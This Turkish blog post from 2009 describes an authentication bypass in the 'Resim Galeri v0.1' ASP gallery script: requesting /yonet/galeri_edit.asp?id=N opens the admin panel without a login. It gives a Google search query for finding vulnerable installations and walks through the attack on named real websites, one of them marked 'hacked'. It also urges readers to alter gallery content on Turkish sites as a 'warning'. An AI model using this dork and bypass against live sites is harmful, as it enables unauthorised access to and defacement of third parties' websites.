Arşiv

Archive for the ‘güvenlik açıkları’ Category

Resim Galeri v0.1 [ID] Bypass Vulnerability

11/08/2009 Yorum yapın

Selamlar arkadaşlar bugün size basit bir galeri script açığı gösterecem… Resim Galeri v0.1 Epeydir var özellikle .tr uzantılı domainleri epeyce uyarmaya çalıştım..

Scripti buradan indirip,detaylı aramalar için kullanabilirsiniz..

www.aspindir.com/Goster/4190

Exploit : http://site.com/script/yonet/galeri_edit.asp?id=Edit Number ID [Ex:1,2,3]

Örnek : http://www.tiestoturk.com/galeri/default.asp                              
                                    /galeri/resim_detay.asp?id=26                    
                                      /yonet/galeri_edit.asp?id=26 and hacked

Şimdi gelelim anlatımıza,

 1) Öncelikle google’a giriyoruz, detaylı arama yapmak için  inurl:resim_detay.asp?id= yazıyoruz, tabi siz daha farklı aramalar oluştarabilirsiniz…

2) örnek bir site buluyoruz

mesela sitemiz bu http://www.kaysut.com.tr/eng/galeri/resim_detay.asp?id=1

scriptin kurulu olduğu yer, http://www.kaysut.com.tr/eng/galeri/

script paneli, /yonet

biz panele giriş yapıp galerideki resime verilen ismi editleyecez,

http://www.kaysut.com.tr/eng/galeri/ adresine qidiyoruz.. en üst soldaki resme tıklıyoruz,

bize http://www.kaysut.com.tr/eng/galeri/resim_detay.asp?id=1 bu adres çıkıyor, yani id=1 1 numaralı resmin Adı kaysüt, bizde yonet/galeri_edit.asp?id=1 yapınca karşıma admin paneli çıkacak, ve burdan resim adını editleyebilir, Türk sitelerini uyarabilirsiniz..

Categories: güvenlik açıkları
Takip Et

Get every new post delivered to your Inbox.